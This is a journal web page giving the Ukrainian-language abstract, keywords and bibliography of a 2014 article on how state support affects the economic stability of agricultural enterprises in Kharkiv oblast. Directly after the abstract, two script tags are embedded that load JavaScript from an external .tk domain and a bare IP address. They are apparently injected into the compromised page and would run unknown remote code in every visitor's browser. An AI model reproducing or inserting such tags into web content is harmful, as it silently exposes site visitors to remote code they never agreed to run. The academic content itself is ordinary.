ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.246.027:[631.15:330.36]
Аграрний менеджмент і підприємництво

Державна підтримка у забезпеченні економічної стійкості сільськогосподарських підприємств / Калашнікова Т. В., Клєпчева О.В. // Економіка АПК. - 2014. - № 2 - С. 51

Сформульовано авторський підхід до трактування сутності категорії “економічна стійкість підприємства”. Визначено, що державна підтримка є одним з пріоритетних напрямів реалізації стратегічного розвитку та забезпечення економічної стійкості сільськогосподарських підприємств. Обґрунтовано методичні засади оцінки впливу державної підтримки на економічну стійкість сільськогосподарських підприємств, проаналізовано вплив державної підтримки на результати діяльності та економічну стійкість сільськогосподарських підприємств Харківської області за 2007–2012 роки. В процесі дослідження визначено, що одержання державної підтримки позитивно впливає на економічну стійкість сільськогосподарських підприємств, оскільки забезпечує переважаючі темпи зростання показників ефективності виробництва й знижує рівень їх коливання. Табл.: 2. Рис.: 1. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: державна підтримка, економічна стійкість підприємства, сільськогосподарські підприємства, тенденція, залишкова варіація, ефективність виробництва, чиста продукція

Список використаних джерел

 1. Андрійчук В.Г. Економіка аграрних підприємств: підруч. – 2-ге вид, доповн. і переробл. / В.Г.Андрійчук. – К.: КНЕУ, 2002. – 624 с.
 2. Ансофф И. Стратегический менеджмент / И. Ансофф. – СПб.: Питер, 2011. – 344 с.
 3. Ареф'єва О.В. Методичний підхід до оцінки та механізм моніторингу економічної стійкості підприємства / О.В. Ареф'єва, Д.М. Городинська // Формування ринкових відносин в Україні. – 2006. – № 6( 61).– С. 57-61.
 4. Брянцева И.В. Экономическая устойчивость предприятия: сущность, оценка, управление / И.В. Брянцева. – Хабаровск: Хабаровский госуд. технич. ун-т, 2007. – 150 с.
 5. Виклики і шляхи агропродовольчого розвитку / [Пасхавер Б.Й., Шубравська О.В., Молдаван Л.В. та ін.]; за ред. акад. УААН Б.Й. Пасхавера; НАН України; Ін-т екон. та прогнозув. – К., 2009. – 432 с.
 6. Гудзь О.Є. Фінансові ресурси сільськогосподарських підприємств: моногр. / О.Є. Гудзь. – К.: ННЦ ІАЕ, 2007. – 578 с.
 7. Дем’яненко М.Я. Державна політика фінансової підтримки розвитку аграрного сектору АПК: моногр. [Дем’яненко М.Я., Саблук П.Т., Скупий В.М. та ін.]; за ред. М.Я. Дем’яненка. – К.: ННЦ ІАЕ, 2011. – 372 с.
 8. Державна підтримка агросфери: еволюція, проблеми / Бородіна О.М., Киризюк С.В., Попова О.Л. та ін.; за ред. О.М. Бородіної. – К.: Ін-т екон. та прогнозув. НАНУ, 2008. – 264 с.
 9. Діброва А.Д. Державне регулювання сільськогосподарського виробництва: теорія, методологія, практика / А.Д. Діброва. – К.:ВРД “Формат”, 2008. – 488 с.
 10. Колобов А.А. Стратегическое управление организационно-экономической устойчивостью фирмы. Логистико-ориентированное проектирование бизнеса / А.Д. Канчавели, А.А. Колобов, И.Н. Омельченко и др.; ред. А.А. Колобов, И.Н. Омельченко. – М.: Изд-во МГТУ им. Н.Э. Баумана, 2001. – 600 с.
 11. Москаленко А.М. Особливості формування орендної плати в сільськогосподарських підприємствах зони Полісся / А.М.Москаленко // Економіка АПК. – 2013. – № 12. – С.19-25.
 12. Олійник О.В. Критерії державної підтримки сільськогосподарських підприємств/ О.В.Олійник, Т.В.Калашнікова // Економіка АПК. – 2013. - № 2. – С.49-53.
 13. Онегіна В.М. Державне регулювання цін і доходів сільськогосподарських товаровиробників: моногр. / В.М. Онегіна. – К.: ННЦ ІАЕ, 2007. – 590 с.
 14. Соціальний портрет українського землевласника // Аграрний тиждень [Електронний ресурс]. – Режим доступу: http://www.a7d.com.ua/agropolitika.
 15. Стратегія розвитку аграрного сектору економіки на період до 2020 року/ http://zakon1.rada.gov.ua/laws/show/806-2013-р#n7.
 16. Promoting Sustainable Agriculture and Rural Development [Електронний ресурс]. – Режим доступу: http://www. unep.org/Documents.Multilingual/Default.asp?DocumentID=52&ArticleID=62
 17. Goldratt E.M. What Is This Thing Called Theory of Constraints, and How Should It Be Implemented? Croton-on-Hudson. NY: ASQC Quality Press, 1997.
Читати статтю: 14_02_51-56.pdf